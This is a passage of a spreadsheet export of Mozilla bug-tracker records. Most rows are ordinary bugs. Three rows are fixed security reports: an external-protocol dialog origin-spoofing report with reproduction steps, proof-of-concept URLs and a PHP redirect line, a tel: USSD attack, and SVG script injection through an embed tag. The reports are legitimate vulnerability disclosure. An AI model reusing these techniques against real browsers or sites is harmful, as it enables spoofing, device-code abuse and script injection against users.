      <c r="I5531" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5531" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K5531" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5531" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5531" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5531" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5531" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5531" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][domsecurity-active][adv-main96+][adv-ESR91.5+]</t>
        </is>
      </c>
      <c r="Q5531" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5531" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5531" t="inlineStr">
        <is>
          <t>96 Branch</t>
        </is>
      </c>
      <c r="T5531" t="n">
        <v>1</v>
      </c>
      <c r="U5531" t="n">
        <v>0</v>
      </c>
      <c r="V5531" t="n">
        <v>46</v>
      </c>
      <c r="W5531" t="inlineStr">
        <is>
          <t>Created attachment 9215887
spoofs-calc.mp4
VULNERABILITY DETAILS
A URL responding with a server-side redirect to an external protocol can trigger an external protocol dialog with a spoofed origin. The origin is never the redirecting URL's origin. Instead, the initiating page's origin (or precursor origin if opaque) is shown in dialogs.
For example, if a page on https://www.google[.]com contains a link (&lt;a href="..."&gt;) to https://attacker[.]tld/redirect, and a user clicks the link, the dialog will show https://www.google[.]com as the origin instead of https://attacker[.]tld .
Similarly, if a page on https://www.google[.]com navigates the current window or new window via JavaScript (window.location or window.open()) to https://attacker[.]tld/redirect, the dialog will show https://www.google[.]com as the origin.
In effect, the behavior is the same as if the page had directly used the external protocol URL (ms-calculator:) instead of the HTTPS URL (https://attacker[.]tld/redirect).
As far as I can tell, common protections such as CSP and iframe sandboxing are bypassed in most scenarios.
No user interaction is needed if a user previously checked "Always allow {origin} to open {protocol} links" and "Always use this application to open {protocol} links" for the target origin and protocol, or if allowed via enterprise policy: https://github.com/mozilla/policy-templates/blob/master/README.md#handlers
ADDITIONAL INFO
A malicious URL could be placed in search result pages, "external link" interstitial pages, user-provided URLs in content, among many other scenarios. Most websites filter input to only allow http(s) URLs (generally to avoid javascript: URLs which are blocked by browser in server-side redirects), therefore this works as an effective bypass to spoof the origin across most websites and navigation methods.
See attached video spoof-google-search.mp4 for Google Search demo with both calc and tel PoCs. Note that I only enabled this PoC to work from my IP address for a few minutes to record the video.
External protocols in server-side redirects probably should be treated similarly to javascript: URLs in server-side redirects, which are blocked by the browser as unsafe. Otherwise, the browser could render a blank page with origin set to the server-side redirect initiator, to ensure the dialog and address bar show the correct origin and the tab doesn't have another origin's content rendered.
VERSION
Firefox Version: 87.0 Stable (Build ID 20210318103112), also repros in 89.0a1 Nightly (Build ID 20210413093459 and 20210414093129)
Operating System: Windows_NT 10.0 19042
REPRODUCTION CASE
Scenario 1: Link click
1. Navigate to https://alesandroortiz.com/security/firefox/external-protocol/spoof-links.html
2. Click either of the links
Observed: External protocol dialog shown with current page origin (https://alesandroortiz[.]com)
Expected: External protocol dialog is not shown or is shown with redirecting origin (https://aogarantiza[.]com)
Scenario 2: JavaScript redirect (window.location)
1. Navigate to https://www.google.com/url?q=https%3A%2F%2Faogarantiza.com%2Ffirefox%2Fexternal-protocol%2Fcalc.php&amp;sa=D&amp;sntz=1&amp;usg=AFQjCNEoF7jt2NHEpoTRgtZbbx8F6Na1Gg
Observed: Dialog shown with spoofed origin.
Expected: Dialog shown with correct origin.
Scenario 3: Page has iframe with user-controlled src to URL responding with server-side redirect
1. Navigate to https://alesandroortiz.com/security/firefox/external-protocol/spoof-iframe-sandbox-calc.html
Observed: Dialog shown with embedding page origin (https://alesandroortiz[.]com)
Expected: Dialog shown with iframe src origin (https://aogarantiza[.]com)
Scenario 4: Attacker page with refreshing iframe with client-side redirect leading to server-side redirect
1. Navigate to https://alesandroortiz.com/security/firefox/external-protocol/spoof-iframe-src-calc.html
Observed: Dialog repeatedly shown with embedding page origin (https://alesandroortiz[.]com)
Expected: Dialog repeatedly shown with iframe src origin (https://aogarantiza[.]com)
Scenario 5: Background tab is able to show dialog on different tab, combined with refreshing iframe for repeated dialogs (the latter also demonstrated in Scenario 4 PoC)
1. Navigate to https://alesandroortiz.com/security/firefox/external-protocol/spoof-calc-diff-tab.html
2. Click "Continue to Google.com" button
Observed: Dialog is shown in the currently active tab, even if the tab is on a different origin
Expected: Dialog is only shown in tab which opened the dialog and was opened by the same origin as the current page
Scenario 6: Non-security UI bug -- Page with iframe srcdoc (sandboxed)
1. Navigate to https://alesandroortiz.com/security/firefox/external-protocol/spoof-iframe-srcdoc-calc.html
2. Observe onload PoC of second iframe, then click link in first iframe
Observed: Dialog shown with checkbox, but checkbox label is blank. Checking the box doesn't do anything, but in this case the checkbox should be hidden. For reference, the origin shown is moz-nullprincipal: which is expected behvior.
Expected: Dialog shown without checkbox.
Other scenarios in PoCs below.
You can re-test any of the app protocol PoCs after checking "Always allow..." and "Always use..." to verify the app will be launched without interaction if previously allowed.
ALL PROOF OF CONCEPTS
App protocols:
https://alesandroortiz.com/security/firefox/external-protocol/spoof-links.html
https://alesandroortiz.com/security/firefox/external-protocol/spoof-iframe-sandbox-calc.html
https://alesandroortiz.com/security/firefox/external-protocol/spoof-iframe-src-calc.html
https://alesandroortiz.com/security/firefox/external-protocol/spoof-calc-diff-tab.html
App protocols, misc:
https://alesandroortiz.com/security/firefox/external-protocol/spoof-new-tab.html
Non-security UI bug with sandbox + srcdoc behavior:
https://alesandroortiz.com/security/firefox/external-protocol/spoof-iframe-srcdoc-calc.html
Google external link demo, user click (equivalent to spoof-links.html PoC):
https://www.google.com/url?q=https://aogarantiza.com/firefox/external-protocol/calc.php
Google ~open client-side redirect demo, window.location (used in iframe PoCs to spoof Google origin):
https://www.google.com/url?q=https%3A%2F%2Faogarantiza.com%2Ffirefox%2Fexternal-protocol%2Fcalc.php&amp;sa=D&amp;sntz=1&amp;usg=AFQjCNEoF7jt2NHEpoTRgtZbbx8F6Na1Gg
The automatic Google redirect links were created by creating links in Google Sites: https://sites.google.com/view/aortest1/external-protocol-poc-1-firefox
Source for HTML files attached. Source for server-side redirect URLs below:
calc.php: &lt;?php header('Location: ms-calculator:'); ?&gt;
CREDIT INFORMATION
Reporter credit: Alesandro Ortiz &lt;https://AlesandroOrtiz.com&gt;</t>
        </is>
      </c>
      <c r="X5531" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5532">
      <c r="A5532" t="n">
        <v>111255</v>
      </c>
      <c r="B5532" t="inlineStr">
        <is>
          <t>2001-11-21 11:12:32 -0800</t>
        </is>
      </c>
      <c r="C5532" t="inlineStr">
        <is>
          <t>[PATCH] Adjacent images flow oddly, appears to split images</t>
        </is>
      </c>
      <c r="D5532" t="inlineStr">
        <is>
          <t>2002-01-21 22:25:45 -0800</t>
        </is>
      </c>
      <c r="E5532" t="n">
        <v>1</v>
      </c>
      <c r="F5532" t="n">
        <v>1</v>
      </c>
      <c r="G5532" t="n">
        <v>3</v>
      </c>
      <c r="H5532" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5532" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5532" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5532" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5532" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5532" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5532" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5532" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5532" t="inlineStr">
        <is>
          <t>[bae:20011127]</t>
        </is>
      </c>
      <c r="Q5532" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5532" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5532" t="inlineStr">
        <is>
          <t>mozilla0.9.8</t>
        </is>
      </c>
      <c r="T5532" t="n">
        <v>1</v>
      </c>
      <c r="U5532" t="n">
        <v>0</v>
      </c>
      <c r="V5532" t="n">
        <v>23</v>
      </c>
      <c r="W5532" t="inlineStr">
        <is>
          <t>Mozilla .0.9.6 appears to flow adjacent images in an interesting way.  If a
couple of images are next to each other, and the first is aligned left, the
second one will flow around it; if the image is larger, it will split along the
middle.  Result is that the two images appear to be 3 images: 2 with the same
height, and a third with the same width as the second, but left-justified and
some white space down.
This "third" image will be on top of any text present after the images.
I noticed this with a page that uses stylesheets to right-justify a header, but
wanted a single button image left-justified within that class.  Well, it works
in Mozilla up to .0.9.5, and in all versions of IE and Opera I test with.
Decomposed the test case to simple HTML (see below).
&lt;html&gt;
&lt;head&gt;
  &lt;title&gt;clevermonkey dot org | mozilla test&lt;/title&gt;
  &lt;link rel="creator" href="mailto:jdv@clevermonkey.org" type="text/html"&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;!-- Header --&gt;
&lt;p&gt;
&lt;img src="images/monkeyglyph.png" alt="[monkey glyph]" align="left"&gt;
&lt;img src="images/clevermonkey.png" alt="welcome to clevermonkey dot org"&gt;
&lt;/p&gt;
&lt;!-- END Header --&gt;
&lt;!-- Main text box, left col fully justified --&gt;
&lt;div&gt;
&lt;p&gt;This is a test of Mozilla 0.9.6.&lt;/p&gt;
&lt;/div&gt;
&lt;!-- END main text box --&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
        </is>
      </c>
      <c r="X5532" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5533">
      <c r="A5533" t="n">
        <v>1728742</v>
      </c>
      <c r="B5533" t="inlineStr">
        <is>
          <t>2021-09-02 02:21:40 -0700</t>
        </is>
      </c>
      <c r="C5533" t="inlineStr">
        <is>
          <t>Using `tel:` URI to perform USSD attack</t>
        </is>
      </c>
      <c r="D5533" t="inlineStr">
        <is>
          <t>2024-09-15 23:49:22 -0700</t>
        </is>
      </c>
      <c r="E5533" t="n">
        <v>1</v>
      </c>
      <c r="F5533" t="n">
        <v>1</v>
      </c>
      <c r="G5533" t="n">
        <v>3</v>
      </c>
      <c r="H5533" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5533" t="inlineStr">
        <is>
          <t>GeckoView</t>
        </is>
      </c>
      <c r="J5533" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5533" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5533" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5533" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5533" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5533" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5533" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main97+]</t>
        </is>
      </c>
      <c r="Q5533" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5533" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5533" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5533" t="n">
        <v>1</v>
      </c>
      <c r="U5533" t="n">
        <v>0</v>
      </c>
      <c r="V5533" t="n">
        <v>62</v>
      </c>
      <c r="W5533" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Steps to reproduce:
1. Visit https://kirtikumarar.com/mozilla/ussd.html
2. Click on Hyperlink
Actual results:
It sends the complete USSD code to the dialer and shows the IMEI Number. 
Expected results:
It should strip out everything after " * "</t>
        </is>
      </c>
      <c r="X5533" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5534">
      <c r="A5534" t="n">
        <v>455472</v>
      </c>
      <c r="B5534" t="inlineStr">
        <is>
          <t>2008-09-16 01:59:15 -0700</t>
        </is>
      </c>
      <c r="C5534" t="inlineStr">
        <is>
          <t>[FIX]code injection with Content-Type: application/octet-stream, embed and svg - no plugins required</t>
        </is>
      </c>
      <c r="D5534" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5534" t="n">
        <v>1</v>
      </c>
      <c r="F5534" t="n">
        <v>1</v>
      </c>
      <c r="G5534" t="n">
        <v>3</v>
      </c>
      <c r="H5534" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5534" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5534" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5534" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5534" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5534" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5534" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5534" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5534" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q5534" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5534" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5534" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T5534" t="n">
        <v>1</v>
      </c>
      <c r="U5534" t="n">
        <v>0</v>
      </c>
      <c r="V5534" t="n">
        <v>48</v>
      </c>
      <c r="W5534" t="inlineStr">
        <is>
          <t>Created attachment 338822
svg.bin - ct binary on purpose
ability to upload file with  Content-Type: application/octet-stream to a web server means ability to execute javascript from the same server.
done via:
&lt;embed id="s1" type="image/svg+xml" src="http://sarwar/svgim1.bin"&gt;
svgim1.bin is svg containing javascript
no plugins are required</t>
        </is>
      </c>
      <c r="X5534" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5535">
      <c r="A5535" t="n">
        <v>177624</v>
      </c>
      <c r="B5535" t="inlineStr">
        <is>
          <t>2002-10-30 20:48:16 -0800</t>
        </is>
      </c>
      <c r="C5535" t="inlineStr">
        <is>
          <t>Wildcard rejects --do_not_change-- in mass-change</t>
        </is>
      </c>
      <c r="D5535" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:33 -0800</t>
        </is>
      </c>
      <c r="E5535" t="n">
        <v>1</v>
      </c>
      <c r="F5535" t="n">
        <v>1</v>
      </c>
      <c r="G5535" t="n">
        <v>4</v>
      </c>
      <c r="H5535" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5535" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5535" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K5535" t="inlineStr">
        <is>
          <t>2.17</t>
        </is>
      </c>
      <c r="L5535" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5535" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5535" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5535" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5535" t="inlineStr"/>
      <c r="Q5535" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5535" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5535" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5535" t="n">
        <v>1</v>
      </c>
      <c r="U5535" t="n">
        <v>0</v>
      </c>
      <c r="V5535" t="n">
        <v>5</v>
      </c>
      <c r="W5535" t="inlineStr">
        <is>
          <t>When a form indicates --do_not_change-- as, for example, QA contact, the
wildcard feature complains that the string did not match anything.  This is true
even in wildcard mode where there shoudl be no reason for wildcard to look
anything up unless there is a "*" in it.</t>
        </is>
      </c>
      <c r="X5535" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5536">
      <c r="A5536" t="n">
        <v>475636</v>
      </c>
      <c r="B5536" t="inlineStr">
        <is>
          <t>2009-01-27 16:18:25 -0800</t>
        </is>
      </c>
      <c r="C5536" t="inlineStr">
        <is>
          <t>Disallow refresh to javascript uris</t>
        </is>
      </c>
      <c r="D5536" t="inlineStr">
        <is>
          <t>2009-07-12 14:36:40 -0700</t>
        </is>
      </c>
      <c r="E5536" t="n">
        <v>1</v>
      </c>
      <c r="F5536" t="n">
        <v>1</v>
      </c>
      <c r="G5536" t="n">
        <v>3</v>
      </c>
      <c r="H5536" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5536" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5536" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5536" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5536" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5536" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5536" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5536" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5536" t="inlineStr">
        <is>
          <t>[sg:moderate] xss hazard</t>
        </is>
      </c>
      <c r="Q5536" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5536" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5536" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5536" t="n">
        <v>1</v>
      </c>
      <c r="U5536" t="n">
        <v>0</v>
      </c>
      <c r="V5536" t="n">
        <v>50</v>
      </c>
      <c r="W5536" t="inlineStr">
        <is>
          <t>This is a spinoff from bug 461413.
We should not allow meta-refresh nor Refresh headers to 'redirect' to javascript URIs. I think we already disallow Location-header redirects to javascript uris because there are lots of sites that host generic redirecters that don't check the URI.
It's entirely possible that that is the case for Refresh redirects too.
IE already blocks javascript uris so it's unlikely that we'll break the web.</t>
        </is>
      </c>
      <c r="X5536" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5537">
      <c r="A5537" t="n">
        <v>670143</v>
      </c>
      <c r="B5537" t="inlineStr">
        <is>
          <t>2011-07-08 07:03:53 -0700</t>
        </is>
      </c>
      <c r="C5537" t="inlineStr">
        <is>
          <t>Make the links, in the main section of the start page, blue to match all other links on the site</t>
        </is>
      </c>
      <c r="D5537" t="inlineStr">
        <is>
          <t>2011-10-07 16:37:03 -0700</t>
        </is>
      </c>
      <c r="E5537" t="n">
        <v>1</v>
      </c>
      <c r="F5537" t="n">
        <v>1</v>
      </c>
      <c r="G5537" t="n">
        <v>5</v>
      </c>
      <c r="H5537" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5537" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5537" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K5537" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5537" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5537" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5537" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5537" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5537" t="inlineStr"/>
      <c r="Q5537" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5537" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5537" t="inlineStr">
        <is>
          <t>2011-10-11</t>
        </is>
      </c>
      <c r="T5537" t="n">
        <v>1</v>
      </c>
      <c r="U5537" t="n">
        <v>0</v>
      </c>
      <c r="V5537" t="n">
        <v>4</v>
      </c>
      <c r="W5537" t="inlineStr">
        <is>
          <t>The links in the "explore" sections of our various start pages are all dark grey like headings and other text. They should be blue like every other link on our site.</t>
        </is>
      </c>
      <c r="X5537" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5538">
      <c r="A5538" t="n">
        <v>605326</v>
      </c>
      <c r="B5538" t="inlineStr">
        <is>
          <t>2010-10-18 16:21:34 -0700</t>
        </is>
      </c>
      <c r="C5538" t="inlineStr">
        <is>
          <t>Referring to a template without a current_revision crashes</t>
        </is>
      </c>
      <c r="D5538" t="inlineStr">
        <is>
          <t>2010-11-11 12:46:30 -0800</t>
        </is>
      </c>
      <c r="E5538" t="n">
        <v>1</v>
      </c>
      <c r="F5538" t="n">
        <v>1</v>
      </c>
      <c r="G5538" t="n">
        <v>5</v>
      </c>
      <c r="H5538" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5538" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5538" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K5538" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5538" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5538" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5538" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5538" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5538" t="inlineStr"/>
      <c r="Q5538" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5538" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S5538" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T5538" t="n">
        <v>1</v>
      </c>
      <c r="U5538" t="n">
        <v>0</v>
      </c>
      <c r="V5538" t="n">
        <v>4</v>
      </c>
      <c r="W5538" t="inlineStr">
        <is>
          <t>If there's a template called Smoo and the expression [[T:Smoo]] in a page, that page will crash when rendered:
  File "/Users/erose/Checkouts/kitsune/apps/wiki/parser.py", line 352, in _hook_template
    c = t.current_revision.content.rstrip()
AttributeError: 'NoneType' object has no attribute 'content'
Don't do that.</t>
        </is>
      </c>
      <c r="X5538" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5539">
      <c r="A5539" t="n">
        <v>1245724</v>
      </c>
      <c r="B5539" t="inlineStr">
        <is>
          <t>2016-02-03 17:43:37 -0800</t>
        </is>
      </c>
      <c r="C5539" t="inlineStr">
        <is>
          <t>NPAPI-initiated network requests can be intercepted by service workers breaking plugin origin expectations</t>
        </is>
      </c>
      <c r="D5539" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:03 -0700</t>
        </is>
      </c>
      <c r="E5539" t="n">
        <v>1</v>
      </c>
      <c r="F5539" t="n">
        <v>1</v>
      </c>
      <c r="G5539" t="n">
        <v>3</v>
      </c>
      <c r="H5539" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5539" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5539" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K5539" t="inlineStr">
        <is>
          <t>44 Branch</t>
        </is>
      </c>
      <c r="L5539" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5539" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5539" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5539" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5539" t="inlineStr">
        <is>
          <t>[post-critsmash-triage] dom-triaged</t>
        </is>
      </c>
      <c r="Q5539" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5539" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5539" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T5539" t="n">
        <v>1</v>
      </c>
      <c r="U5539" t="n">
        <v>0</v>
      </c>
      <c r="V5539" t="n">
        <v>50</v>
      </c>
      <c r="W5539" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Steps to reproduce:
Demo page: https://onesignal.com/serviceworker-flash.html
1. Visit the demo page, and see the video play normally on first page load.
2. Click the Register Service Worker button to register the service worker.
3. Refresh the page for the service worker to take control, and the player will give an error.
4. Force refresh the page without cache (Ctrl + Shift + R) and the player will not give an error.
Actual results:
 Video plays correctly when service worker is not in control. When service worker (even a simple worker) controls the page, the flash video does not play. 
Expected results:
Flash video should play correctly regardless of whether the service worker is in control. This demo service worker does nothing but print a line to the console (does not install onFetch handler or intercept network requests).</t>
        </is>
      </c>
      <c r="X5539" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5540">
      <c r="A5540" t="n">
        <v>1628432</v>
      </c>
      <c r="B5540" t="inlineStr">
        <is>
          <t>2020-04-08 10:32:13 -0700</t>
        </is>
      </c>
      <c r="C5540" t="inlineStr">
        <is>
          <t>Mobile Social Container Research</t>
        </is>
      </c>
      <c r="D5540" t="inlineStr">
        <is>
          <t>2020-06-01 10:54:40 -0700</t>
        </is>
      </c>
      <c r="E5540" t="n">
        <v>1</v>
      </c>
      <c r="F5540" t="n">
        <v>1</v>
      </c>
      <c r="G5540" t="n">
        <v>5</v>
      </c>
      <c r="H5540" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5540" t="inlineStr">
        <is>
          <t>User Research</t>
        </is>
      </c>
      <c r="J5540" t="inlineStr">
        <is>
          <t>Project Request</t>
        </is>
      </c>
      <c r="K5540" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5540" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5540" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5540" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5540" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5540" t="inlineStr"/>
      <c r="Q5540" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5540" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5540" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5540" t="n">
        <v>1</v>
      </c>
      <c r="U5540" t="n">
        <v>0</v>
      </c>
      <c r="V5540" t="n">
        <v>1</v>
      </c>
      <c r="W5540" t="inlineStr">
        <is>
          <t>**Request Description** 
Facebook container on mobile - does this make sense? Will people use it? We want to validate the idea before building/shipping. Elisabeth and I met  with Vesta and Andreas to talk about next steps and the research plan was the result of that.
Product Brief: https://docs.google.com/document/d/1g6I-_dfibEGy-dqvaVssg9Pr_--QT88gTmqvjTvINcI/edit
Research plan: https://docs.google.com/document/d/10MjqyaYRIfGt6LGWYpDXKnFCcpyOBo6kCTyGLH3iA3o/edit
**Deadline** 
This is the on the Q2 roadmap for Fenix. This is a precursor to starting design work.
**Priority Level** 
(1 = High 2 = Medium, 3 = Low):
1?
**Priority Level Description** 
Two reasons - firstly b/c we need some work before we can start design work. The second because this supports Fenix's "Come out of Q2 with 1 feature validated to solve a key user problem" key result which ladders up to "Solve user problems through a proven testing/validation framework" which ladders up to mobile's experimentation objective to find a lever that increase retention.
**Supporting Information**
(Links to any assets or previous research relevant to this project.)</t>
        </is>
      </c>
      <c r="X5540" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5541">
      <c r="A5541" t="n">
        <v>712289</v>
      </c>
      <c r="B5541" t="inlineStr">
        <is>
          <t>2011-12-20 06:28:12 -0800</t>
        </is>
      </c>
      <c r="C5541" t="inlineStr">
        <is>
          <t>jsval has different alignments in C and C++ (jsdIValue.getWrappedValue broken on 32-bit)</t>
        </is>
      </c>
      <c r="D5541" t="inlineStr">
        <is>
          <t>2012-03-30 15:20:27 -0700</t>
        </is>
      </c>
      <c r="E5541" t="n">
        <v>1</v>
      </c>
      <c r="F5541" t="n">
        <v>1</v>
      </c>
      <c r="G5541" t="n">
        <v>3</v>
      </c>
      <c r="H5541" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5541" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5541" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5541" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5541" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5541" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5541" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
